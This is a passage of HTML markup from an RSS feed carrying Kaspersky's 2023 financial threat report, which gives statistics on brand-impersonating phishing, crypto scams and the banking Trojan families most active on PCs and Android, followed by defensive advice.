https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-800x794.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-50x50.png 50w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01.png 1423w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112529" class="wp-caption-text">Sample of a phishing site that impersonates Amazon</p></div>
  332. <p>The tenth most-copied site was the Latin American online market MercadoLibre, which was mimicked by 1.77% of phishing pages. Fake sites also frequently targeted Louis Vuitton (5.52%), Shopify (4.73%), Alibaba Group (3.17%), Spotify (3.14%), eBay (3.12%) and Luxottica (2.94%) users.</p>
  333. <div id="attachment_112530" style="width: 658px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112530" class="size-large wp-image-112530" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-648x1024.png" alt="Phishing pages impersonating AliExpress, Spotify and Louis Vuitton websites" width="648" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-648x1024.png 648w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-190x300.png 190w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-768x1213.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-973x1536.png 973w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-1297x2048.png 1297w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-222x350.png 222w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-633x1000.png 633w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-177x280.png 177w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-570x900.png 570w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02.png 1568w" sizes="(max-width: 648px) 100vw, 648px" /></a><p id="caption-attachment-112530" class="wp-caption-text">Phishing pages impersonating AliExpress, Spotify and Louis Vuitton websites</p></div>
  334. <p>One of the most common scam types targeting online shoppers consists in cybercriminals offering heavy discounts (which, of course, expire soon), special offers, early access to goods or entertainment, and other &#8220;bargains&#8221;. Both home users and businesses were targeted. For instance, in the screenshot below, a fake page presumably is offering a bus at an attractive price. If the user attempts to buy the vehicle, they are prompted to log in with their eBay account, which is then stolen.</p>
  335. <div id="attachment_112531" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112531" class="size-large wp-image-112531" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-1024x505.png" alt="Fake page offering a bus at a relatively low price" width="1024" height="505" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-1024x505.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-300x148.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-768x378.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-1536x757.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-710x350.png 710w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-740x365.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-568x280.png 568w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-800x394.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03.png 1810w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112531" class="wp-caption-text">Fake page offering a bus at a relatively low price</p></div>
  336. <p>Fraudsters use similar scams on social networks. For example, in the screenshot below, a fake Instagram store is offering Louis Vuitton products.</p>
  337. <div id="attachment_112532" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112532" class="size-large wp-image-112532" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-1024x760.png" alt="Fake Louis Vuitton store on Instagram" width="1024" height="760" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-1024x760.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-300x223.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-768x570.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-471x350.png 471w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-740x549.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-377x280.png 377w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-800x594.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04.png 1064w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112532" class="wp-caption-text">Fake Louis Vuitton store on Instagram</p></div>
  338. <p>As new and more secure, authentication technologies appear, scammers find ways to evade these, too. The phishing page in the screenshot below, mimicking the Shopify sign-in form, implements a scenario for when the victim uses a <a href="https://help.shopify.com/en/manual/your-account/logging-in/passkeys" target="_blank" rel="noopener">passkey</a> as the authentication method. Passkeys can only be used on websites and apps they are created for. To authorize <a href="https://developers.google.com/identity/passkeys" target="_blank" rel="noopener">passkey authentication</a>, the user has to unlock the device the passkey was issued for. That means passkeys are of no use to phishers. To trick users into choosing to authenticate with a manually entered one-time code, the fake page displays an error message.</p>
  339. <div id="attachment_112533" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112533" class="size-large wp-image-112533" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-1024x554.png" alt="Fake Shopify page trying to bypass passkey authentication" width="1024" height="554" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-1024x554.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-300x162.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-768x415.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-1536x831.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-647x350.png 647w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-740x400.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-518x280.png 518w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-800x433.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05.png 1605w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112533" class="wp-caption-text">Fake Shopify page trying to bypass passkey authentication</p></div>
  340. <h3 id="payment-system-phishing">Payment system phishing</h3>
  341. <p>Payment systems were mimicked in 19.88% of financial phishing attacks detected and blocked by Kaspersky products in 2023.</p>
  342. <div class="js-infogram-embed" data-id="_/QDfxNNGdun3BJEfYfUly" data-type="interactive" data-title="05 EN Financial report graphs" style="min-height:;"></div>
  343. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 5 payment systems mimicked by phishing and scam pages (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160007/05-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  344. <p>Among these, PayPal (54.73%) was the one that received the most attention, with more than half of attacks using its image.</p>
  345. <div id="attachment_112534" style="width: 1012px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112534" class="size-large wp-image-112534" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-1002x1024.png" alt="Fake page targeting PayPal users" width="1002" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-1002x1024.png 1002w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-294x300.png 294w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-768x785.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-343x350.png 343w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-740x756.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-274x280.png 274w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-800x817.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-50x50.png 50w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06.png 1294w" sizes="(max-width: 1002px) 100vw, 1002px" /></a><p id="caption-attachment-112534" class="wp-caption-text">Fake page targeting PayPal users</p></div>
  346. <p>Other most frequently victimized payment systems included MasterCard (16.58%), Visa (8.43%), Interac (4.05%) and PayPay (2.96%). Notably, of these, Visa and MasterCard are typically mimicked on fake payment pages linked to a variety of phishing and scam sites.</p>
  347. <h3 id="cryptocurrency-scams">Cryptocurrency scams</h3>
  348. <p>In 2023, the number of phishing and scam attacks relating to cryptocurrencies continued to grow. Kaspersky antiphishing technologies prevented 5 838 499 attempts to follow a cryptocurrency-themed phishing link, which is 16% more than in 2022. This may be due to the fact that the Bitcoin rate, after hitting rock bottom in 2022, started to climb again in 2023. With the price of the number-one cryptocurrency setting new records at the beginning of 2024, this trend can be expected to develop further.</p>
  349. <p>We have seen a number of different cryptocurrency-related schemes throughout the year. Scammers impersonated well-known cryptocurrency exchanges and offered coins in the name of major companies. Among the most notable schemes was a <a href="https://securelist.com/hot-and-cold-cryptowallet-phishing/110136/" target="_blank" rel="noopener">phishing campaign</a> that targeted hardware crypto cold wallets. This type of wallet, normally disconnected from the internet, is considered quite safe. However, under the guise of a crypto giveaway, the attackers tricked users into connecting their hardware wallets to a fake website.</p>
  350. <p>We have also seen crypto wallet phishing using well-known non-cryptocurrency brands as a lure. For example, a phishing website bearing the Apple logo and photos of Apple products invited users to get cryptocurrency called &#8220;AppleCoin&#8221;. Interestingly, a coin under that name does exist, but it has nothing to do with Apple Inc.</p>
  351. <div id="attachment_112535" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112535" class="size-large wp-image-112535" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-1024x391.png" alt="Phishing website touting AppleCoin in the name of Apple Inc" width="1024" height="391" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-1024x391.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-300x114.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-768x293.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-1536x586.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-2048x781.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-918x350.png 918w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-740x282.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-734x280.png 734w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-800x305.png 800w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112535" class="wp-caption-text">Phishing website touting AppleCoin in the name of Apple Inc</p></div>
  352. <p>If the user believes that Apple has at last issued its own cryptocurrency and enters their wallet credentials, the scammers grab their funds.</p>
  353. <h2 id="pc-malware">PC malware</h2>
  354. <p>In 2023, the decline in the number of users affected by financial PC malware continued. Our data showed a decrease from 350,808 in 2022 to 312,453 in 2023, reflecting an 11% drop. This trend has persisted for the past years, and there are several reasons for that. First, users increasingly prefer mobile banking, and sign in to their online bank accounts on PCs less frequently than on smartphones. Although they may still store their banking credentials in browsers on their desktop computers, most notorious banking malware for PCs was repurposed to deliver other malware, such as ransomware, to infected systems. Often, these banking Trojans are used in more sophisticated targeted attacks, which usually means they infect fewer users.</p>
  355. <div class="js-infogram-embed" data-id="_/2ZwjMzgN2sPpUkWc7Tkv" data-type="interactive" data-title="06 EN Financial report graphs" style="min-height:;"></div>
  356. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Changes in the number of unique users attacked by banking malware in 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160037/06-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  357. <p>As can be seen in the graph above, banking malware attacks spiked in March. This coincided with a fourfold increase in <a href="https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/#emotet" target="_blank" rel="noopener">Emotet</a>&#8216;s activity, which was its last large-scale campaign observed in 2023.</p>
  358. <h3 id="key-banking-malware-actors">Key banking malware actors</h3>
  359. <p>The notable strains of banking Trojans in 2023 included Ramnit (35.1%), Zbot (22.5%) and Emotet (16.2%), which remained the top three financial malware families for the PC. The percentages of all three grew compared to 2022, together comprising nearly three-quarters of all financial malware attacks on desktop computers.</p>
  360. <table width="100%">
  361. <tbody>
  362. <tr>
  363. <td width="25%"><strong>Name</strong></td>
  364. <td width="60%"><strong>Verdict</strong></td>
  365. <td width="15%"><strong>%*</strong></td>
  366. </tr>
  367. <tr>
  368. <td>Ramnit/Nimnul</td>
  369. <td>Trojan-Banker.Win32.Ramnit</td>
  370. <td>35.1</td>
  371. </tr>
  372. <tr>
  373. <td>Zbot/Zeus</td>
  374. <td>Trojan-Banker.Win32.Zbot</td>
  375. <td>22.5</td>
  376. </tr>
  377. <tr>
  378. <td>Emotet</td>
  379. <td>Trojan-Banker.Win32.Emotet</td>
  380. <td>16.2</td>
  381. </tr>
  382. <tr>
  383. <td>CliptoShuffler</td>
  384. <td>Trojan-Banker.Win32.CliptoShuffler</td>
  385. <td>6.9</td>
  386. </tr>
  387. <tr>
  388. <td>Danabot</td>
  389. <td>Trojan-Banker.Win32.Danabot</td>
  390. <td>2.2</td>
  391. </tr>
  392. <tr>
  393. <td>Tinba</td>
  394. <td>Trojan-Banker.Win32.Tinba</td>
  395. <td>2.1</td>
  396. </tr>
  397. <tr>
  398. <td>SpyEyes</td>
  399. <td>Trojan-Spy.Win32.SpyEye</td>
  400. <td>1.9</td>
  401. </tr>
  402. <tr>
  403. <td>Qbot/Qakbot</td>
  404. <td>Trojan-Banker.Win32.Qbot</td>
  405. <td>1.8</td>
  406. </tr>
  407. <tr>
  408. <td>BitStealer</td>
  409. <td>Trojan-Banker.Win32.BitStealer</td>
  410. <td>1.3</td>
  411. </tr>
  412. <tr>
  413. <td>IcedID</td>
  414. <td>Trojan-Banker.Win32.IcedID</td>
  415. <td>1.2</td>
  416. </tr>
  417. </tbody>
  418. </table>
  419. <p><em>* Unique users who encountered this malware family as a percentage of all users attacked by financial malware</em></p>
  420. <p>These three Trojans have a range of capabilities apart from stealing banking credentials. They can download additional modules and third-party malware, collect various types of data, such as passwords stored in browsers, and perform other malicious activities.</p>
  421. <p>Fourth and fifth were CliptoShuffler (6.9%) and Danabot (2.2%), both frequently appearing in the rankings, and in sixth place was Tinba (2.2%), also known as &#8220;Tiny Banker Trojan&#8221;. Although we have not seen this family among the most active banking Trojans in previous years, it dates back to 2012, and its source code has been leaked. It is written in Assembler and gets its name for a remarkably small size.</p>
  422. <p>Among other most active banking malware types were SpyEyes (1.9%), <a href="https://securelist.com/qbot-banker-business-correspondence/109535/" target="_blank" rel="noopener">QakBot</a> (1.8%), BitStealer (1.3%) and IcedID (1.2%).</p>
  423. <h3 id="brazilian-malware">Brazilian malware</h3>
  424. <p>While the overall number of desktop financial malware attacks has steadily declined, we have observed a <a href="https://securelist.com/kaspersky-security-bulletin-crimeware-financial-threats-2024/111093/#resurgence-of-brazilian-banking-trojans" target="_blank" rel="noopener">trend</a> for Brazilian families attempting to fill the void. In the beginning of 2023, we shared insights into new functionality added to <a href="https://securelist.com/prilex-modification-now-targeting-contactless-credit-card-transactions/108569/" target="_blank" rel="noopener">Prilex</a>, a type of malware known to target ATMs and PoS (point of sale) terminals. Kaspersky experts found the new modification was specifically designed to exploit contactless payments. When someone tries to pay with a contactless card, the infected PoS terminal displays an error message, prompting the buyer to insert the card and thus helping attackers to capture sensitive payment details. Cybercriminals can then run unauthorized transactions and potentially steal large sums of money from unsuspecting victims.</p>
  425. <p>Another interesting malware strain is <a href="https://securelist.com/crimeware-report-gopix-lumar-rhysida/110871/#gopix" target="_blank" rel="noopener">GoPIX</a>, which targets the Brazilian instant payment system <a href="https://en.wikipedia.org/wiki/Pix_(payment_system)" target="_blank" rel="noopener">PIX</a>. It spreads by impersonating the WhatsApp web app. Once successfully installed, it starts monitoring clipboard contents. If the malware detects PIX transaction data, it substitutes it with malicious data, tricking the user into transferring money to cybercriminals. It targets Bitcoin and Ethereum transactions in the same manner.</p>
  426. <p>Recently, our Global Research and Analysis Team (GReAT) discovered <a href="https://securelist.com/coyote-multi-stage-banking-trojan/111846/" target="_blank" rel="noopener">Coyote</a>, a new banking Trojan of Brazilian origin. Targeting more than 60 banking institutions, primarily in Brazil, this malware uses a sophisticated infection chain that utilizes various relatively new technologies. Spreading via the Squirrel installer, it leverages a NodeJS environment and the Nim programming language to complete infection. Coyote is capable of keylogging, taking screenshots, and setting up fake pages to steal user credentials.</p>
  427. <h3 id="geography-of-pc-banking-malware-attacks">Geography of PC banking malware attacks</h3>
  428. <p>To highlight the countries where financial malware was most prevalent in 2023, we calculated the share of users who encountered banking Trojans in the total number attacked by any type of malware in the country. The following statistics indicate where users are most likely to encounter financial malware.</p>
  429. <p>The highest share of banking Trojans was registered in Afghanistan (6%), Turkmenistan (5.2%) and Tajikistan (3.7%). Switzerland (3.2%) and Mauritania (3%) were also among the worst affected by this type of threats.</p>
  430. <p>TOP 20 countries by share of attacked users</p>
  431. <table width="100%">
  432. <tbody>
  433. <tr>
  434. <td width="70%"><strong>Country*</strong></td>
  435. <td width="30%"><strong>%**</strong></td>
  436. </tr>
  437. <tr>
  438. <td>Afghanistan</td>
  439. <td>6</td>
  440. </tr>
  441. <tr>
  442. <td>Turkmenistan</td>
  443. <td>5.2</td>
  444. </tr>
  445. <tr>
  446. <td>Tajikistan</td>
  447. <td>3.7</td>
  448. </tr>
  449. <tr>
  450. <td>China</td>
  451. <td>3.2</td>
  452. </tr>
  453. <tr>
  454. <td>Switzerland</td>
  455. <td>3</td>
  456. </tr>
  457. <tr>
  458. <td>Mauritania</td>
  459. <td>2.4</td>
  460. </tr>
  461. <tr>
  462. <td>Sudan</td>
  463. <td>2.3</td>
  464. </tr>
  465. <tr>
  466. <td>Egypt</td>
  467. <td>2.2</td>
  468. </tr>
  469. <tr>
  470. <td>Syria</td>
  471. <td>2.1</td>
  472. </tr>
  473. <tr>
  474. <td>Yemen</td>
  475. <td>2</td>
  476. </tr>
  477. <tr>
  478. <td>Paraguay</td>
  479. <td>2</td>
  480. </tr>
  481. <tr>
  482. <td>Algeria</td>
  483. <td>1.9</td>
  484. </tr>
  485. <tr>
  486. <td>Venezuela</td>
  487. <td>1.9</td>
  488. </tr>
  489. <tr>
  490. <td>Uzbekistan</td>
  491. <td>1.7</td>
  492. </tr>
  493. <tr>
  494. <td>Libya</td>
  495. <td>1.7</td>
  496. </tr>
  497. <tr>
  498. <td>Zimbabwe</td>
  499. <td>1.7</td>
  500. </tr>
  501. <tr>
  502. <td>Spain</td>
  503. <td>1.6</td>
  504. </tr>
  505. <tr>
  506. <td>Pakistan</td>
  507. <td>1.6</td>
  508. </tr>
  509. <tr>
  510. <td>Iraq</td>
  511. <td>1.6</td>
  512. </tr>
  513. <tr>
  514. <td>Thailand</td>
  515. <td>1.5</td>
  516. </tr>
  517. </tbody>
  518. </table>
  519. <p><em>* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.</em><br />
  520. <em>** Unique users whose computers were targeted by financial malware as a percentage of all Kaspersky users who encountered malware in the country.</em></p>
  521. <h3 id="types-of-attacked-users">Types of attacked users</h3>
  522. <p>Consumers (61.2%) were the main target of financial malware attacks in 2023, with their share unchanged from 2022.</p>
  523. <div class="js-infogram-embed" data-id="_/I7U0avE5vXj2GJDgfZvo" data-type="interactive" data-title="07 EN Financial report graphs" style="min-height:;"></div>
  524. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Financial malware attack distribution by type (corporate vs consumer), 2021–2022 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160107/07-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  525. <h2 id="mobile-malware">Mobile Malware</h2>
  526. <p>In 2023, 32% more Android users encountered mobile banking malware than in the previous year: 75,521 attacks compared to 57,219 in 2022. Moreover, we observed notable growth in the number of affected users in the last quarter of the year, which may be due to a new financial malware family called Mamont that targets mainly users in the CIS.</p>
  527. <div class="js-infogram-embed" data-id="_/2FFnOfY8x3bKX5CRjcW1" data-type="interactive" data-title="08 EN Financial report graphs" style="min-height:;"></div>
  528. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of Android users attacked by banking malware by month, 2022–2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160135/08-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  529. <p>The most active Trojan banker was Bian.h (22.22%), followed by Agent.eq (20.95%), whose share grew by 17.50 pp compared to 2022. Third was Faketoken.pac, which affected 5.33% of all users who encountered mobile financial threats in 2023.</p>
  530. <table width="100%">
  531. <tbody>
  532. <tr>
  533. <td width="40%"><strong>Verdict</strong></td>
  534. <td width="15%"><strong>%*, 2022</strong></td>
  535. <td width="15%"><strong>%*, 2023</strong></td>
  536. <td width="15%"><strong>Difference in pp</strong></td>
  537. <td width="15%"><strong>Change in ranking</strong></td>
  538. </tr>
  539. <tr>
  540. <td>Trojan-Banker.AndroidOS.Bian.h</td>
  541. <td>23.78</td>
  542. <td>22.22</td>
  543. <td>-1.56</td>
  544. <td>0</td>
  545. </tr>
  546. <tr>
  547. <td>Trojan-Banker.AndroidOS.Agent.eq</td>
  548. <td>3.46</td>
  549. <td>20.95</td>
  550. <td>+17.50</td>
  551. <td>+6</td>
  552. </tr>
  553. <tr>
  554. <td>Trojan-Banker.AndroidOS.Faketoken.pac</td>
  555. <td>6.42</td>
  556. <td>5.33</td>
  557. <td>-1.09</td>
  558. <td>+1</td>
  559. </tr>
  560. <tr>
  561. <td>Trojan-Banker.AndroidOS.Agent.cf</td>
  562. <td>1.16</td>
  563. <td>4.84</td>
  564. <td>+3.68</td>
  565. <td>+13</td>
  566. </tr>
  567. <tr>
  568. <td>Trojan-Banker.AndroidOS.Agent.ma</td>
  569. <td>0.00</td>
  570. <td>3.74</td>
  571. <td>+3.74</td>
  572. <td></td>
  573. </tr>
  574. <tr>
  575. <td>Trojan-Banker.AndroidOS.Agent.la</td>
  576. <td>0.04</td>
  577. <td>3.20</td>
  578. <td>+3.16</td>
  579. <td></td>
  580. </tr>
  581. <tr>
  582. <td>Trojan-Banker.AndroidOS.Anubis.ab</td>
  583. <td>0.00</td>
  584. <td>3.00</td>
  585. <td>+3.00</td>
  586. <td></td>
  587. </tr>
  588. <tr>
  589. <td>Trojan-Banker.AndroidOS.Agent.lv</td>
  590. <td>0.00</td>
  591. <td>1.81</td>
  592. <td>+1.81</td>
  593. <td></td>
  594. </tr>
  595. <tr>
  596. <td>Trojan-Banker.AndroidOS.Agent.ep</td>
  597. <td>4.17</td>
  598. <td>1.74</td>
  599. <td>-2.44</td>
  600. <td>-4</td>
  601. </tr>
  602. <tr>
  603. <td>Trojan-Banker.AndroidOS.Mamont.c</td>
  604. <td>0.00</td>
  605. <td>1.67</td>
  606. <td>+1.67</td>
  607. <td></td>
  608. </tr>
  609. </tbody>
  610. </table>
  611. <p><em>* Unique users who encountered this malware as a percentage of all Kaspersky mobile security users who encountered banking threats.</em></p>
  612. <h3 id="geography-of-the-attacked-mobile-users">Geography of the attacked mobile users</h3>
  613. <p>To find out which countries were worst affected by mobile financial malware in 2023, we calculated the percentage of users who encountered mobile banking Trojans among all active Kaspersky users in the country. Users in Turkey were attacked the most at 2.98%, with Saudi Arabia coming in second at 1.43% and Spain (1.38%) in third place.</p>
  614. <p>TOP 10 countries by number of users who encountered mobile banking malware, 2023:</p>
  615. <table width="100%">
  616. <tbody>
  617. <tr>
  618. <td width="70%"><strong>Country*</strong></td>
  619. <td width="30%"><strong>%**</strong></td>
  620. </tr>
  621. <tr>
  622. <td>Turkey</td>
  623. <td>2.98%</td>
  624. </tr>
  625. <tr>
  626. <td>Saudi Arabia</td>
  627. <td>1.43%</td>
  628. </tr>
  629. <tr>
  630. <td>Spain</td>
  631. <td>1.38%</td>
  632. </tr>
  633. <tr>
  634. <td>Switzerland</td>
  635. <td>1.28%</td>
  636. </tr>
  637. <tr>
  638. <td>India</td>
  639. <td>0.60%</td>
  640. </tr>
  641. <tr>
  642. <td>Japan</td>
  643. <td>0.52%</td>
  644. </tr>
  645. <tr>
  646. <td>Italy</td>
  647. <td>0.42%</td>
  648. </tr>
  649. <tr>
  650. <td>South Korea</td>
  651. <td>0.39%</td>
  652. </tr>
  653. <tr>
  654. <td>Azerbaijan</td>
  655. <td>0.24%</td>
  656. </tr>
  657. <tr>
  658. <td>Colombia</td>
  659. <td>0.24%</td>
  660. </tr>
  661. </tbody>
  662. </table>
  663. <p><em>* Countries and territories with relatively few (under 25,000) Kaspersky mobile security users have been excluded from the rankings.</em><br />
  664. <em>** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security users in the country.</em></p>
  665. <h2 id="conclusion">Conclusion</h2>
  666. <p>Although the number of users affected by PC banking malware continues to decline, there are other financial threats that underscore the need to stay vigilant and protect your digital assets. Unlike 2022, the year 2023 saw the number of users encountering mobile banking Trojans increase significantly. Cryptocurrency-related phishing and scams continued to grow, too, and they are not expected to stop in the nearest future.</p>
  667. <p>To protect your devices and finance-related accounts:</p>
  668. <ul>
  669. <li>Use secure authentication methods, such as multifactor authentication, strong unique passwords, and so on.</li>
  670. <li>Do not follow links from suspicious messages, and do not enter your credentials or payment details, unless you are 200% sure that the website is legitimate.</li>
  671. <li>Download apps only form trusted sources, such as official app marketplaces.</li>
  672. <li>Use reliable <a href="https://www.kaspersky.com/premium" target="_blank" rel="noopener">security solutions</a> capable of preventing both malware and phishing attacks.</li>
  673. </ul>
  674. <p>To protect your business:</p>
  675. <ul>
  676. <li>Regularly update your software and install security patches in a timely manner.</li>
  677. <li>Improve your employees&#8217; security awareness, conduct regular security training and encourage safe practices, such as proper account protection.</li>
  678. <li>Implement robust monitoring and endpoint security to detect and mitigate threats at an early stage.</li>
  679. <li>Implement network segmentation and default deny policies for users with access to financial assets.</li>
  680. <li>Stay aware of the latest cybercrime trends by obtaining threat intelligence from trusted sources and sharing it with industry partners.</li>
  681. </ul>
  682. ]]></content:encoded>
  684. <wfw:commentRss>https://securelist.com/financial-threat-report-2023/112526/feed/</wfw:commentRss>
  685. <slash:comments>0</slash:comments>
